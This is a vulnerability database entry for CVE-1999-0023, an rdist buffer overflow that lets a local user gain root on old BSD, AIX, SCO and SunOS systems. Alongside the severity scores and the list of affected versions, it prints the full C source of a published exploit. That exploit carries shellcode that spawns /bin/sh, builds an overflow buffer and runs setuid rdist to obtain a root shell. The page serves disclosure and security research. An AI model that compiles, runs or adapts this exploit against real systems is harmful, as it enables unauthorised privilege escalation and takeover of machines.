CVE-1999-0023 : Detail

CVE-1999-0023

0.04%V3
Local
1999-09-29
02h00 +00:00
2024-08-01
16h27 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Local user gains root privileges via buffer overflow in rdist, via lookup() function.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 19106

Publication date : 1996-07-02 22h00 +00:00
Author : Jeff Uphoff
EDB Verified : Yes

/* source: https://www.securityfocus.com/bid/129/info Rdist is a program to maintain identical copies of files over multiple hosts. It preserves the owner, group, mode, and mtime of files if possible and can update programs that are executing. Rdist reads commands from distfile to direct the updating of files and/or directories. Rdist has over time been notorious for security vulnerabilities. In this instance it is vulnerable to a buffer overrun from user supplied data. Given that rdist is setuid root in some enviroments the attacker can excecute this buffer overflow with the resulting commands they craft being executed as root. */ /* cut here Brian Mitchell ([email protected]) */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #define DEFAULT_OFFSET 50 #define BUFFER_SIZE 256 long get_esp(void) { __asm__("movl %esp,%eax\n"); } main(int argc, char **argv) { char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; /* so you dont have to disassemble it, here is the asm code: start: jmp endofk0dez realstart: popl %esi leal (%esi), %ebx movl %ebx, 0x0b(%esi) xorl %edx, %edx movl %edx, 7(%esi) movl %edx, 0x0f(%esi) movl %edx, 0x14(%esi) movb %edx, 0x19(%esi) xorl %eax, %eax movb $59, %al leal 0x0b(%esi), %ecx movl %ecx, %edx pushl %edx pushl %ecx pushl %ebx pushl %eax jmp bewm endofk0dez: call realstart .byte '/', 'b', 'i', 'n', '/', 's', 'h' .byte 1, 1, 1, 1 .byte 2, 2, 2, 2 .byte 3, 3, 3, 3 bewm: .byte 0x9a, 4, 4, 4, 4, 7, 4 */ char execshell[] = "\xeb\x23" "\x5e" "\x8d\x1e" "\x89\x5e\x0b" "\x31\xd2" "\x89\x56\x07" "\x89\x56\x0f" "\x89\x56\x14" "\x88\x56\x19" "\x31\xc0" "\xb0\x3b" "\x8d\x4e\x0b" "\x89\xca" "\x52" "\x51" "\x53" "\x50" "\xeb\x18" "\xe8\xd8\xff\xff\xff" "/bin/sh" "\x01\x01\x01\x01" "\x02\x02\x02\x02" "\x03\x03\x03\x03" "\x9a\x04\x04\x04\x04\x07\x04"; int i; int ofs = DEFAULT_OFFSET; /* if we have a argument, use it as offset, else use default */ if(argc == 2) ofs = atoi(argv[1]); /* print the offset in use */ printf("Using offset of esp + %d (%x)\n", ofs, get_esp()+ofs); buff = malloc(4096); if(!buff) { printf("can't allocate memory\n"); exit(0); } ptr = buff; /* fill start of buffer with nops */ memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell)); ptr += BUFFER_SIZE-strlen(execshell); /* stick asm code into the buffer */ for(i=0;i < strlen(execshell);i++) *(ptr++) = execshell[i]; /* write the return addresses ** ** return address 4 ** ebp 4 ** register unsigned n 0 ** register char *cp 0 ** register struct syment *s 0 ** ** total: 8 */ addr_ptr = (long *)ptr; for(i=0;i < (8/4);i++) *(addr_ptr++) = get_esp() + ofs; ptr = (char *)addr_ptr; *ptr = 0; execl("/usr/bin/rdist", "rdist", "-d", buff, "-d", buff, NULL); } /* cut here */

Products Mentioned

Configuraton 0

Inet>>Inet >> Version 5.01

    Inet>>Inet >> Version 6.01

      Configuraton 0

      Bsdi>>Bsd_os >> Version *

      Freebsd>>Freebsd >> Version 2.0

      Freebsd>>Freebsd >> Version 2.0.5

      Freebsd>>Freebsd >> Version 2.1.0

      Freebsd>>Freebsd >> Version 2.2

      Ibm>>Aix >> Version 3.2

      Ibm>>Aix >> Version 4.1

      Ibm>>Aix >> Version 4.2

      Sco>>Internet_faststart >> Version 1.0

        Sco>>Open_desktop >> Version 2.0

          Sco>>Open_desktop >> Version 3.0

            Sco>>Openserver >> Version 2.0

              Sco>>Openserver >> Version 5.0

                Sco>>Openserver >> Version 5.0.2

                  Sco>>Tcp_ip >> Version 1.2.0

                    Sco>>Tcp_ip >> Version 1.2.1

                      Sco>>Unixware >> Version 2.0

                        Sco>>Unixware >> Version 2.1

                          Sun>>Sunos >> Version -

                          Sun>>Sunos >> Version 4.1.3

                          Sun>>Sunos >> Version 4.1.3u1

                          Sun>>Sunos >> Version 4.1.4

                          Sun>>Sunos >> Version 5.3

                          Sun>>Sunos >> Version 5.4

                          Sun>>Sunos >> Version 5.5

                          Sun>>Sunos >> Version 5.5.1

                          References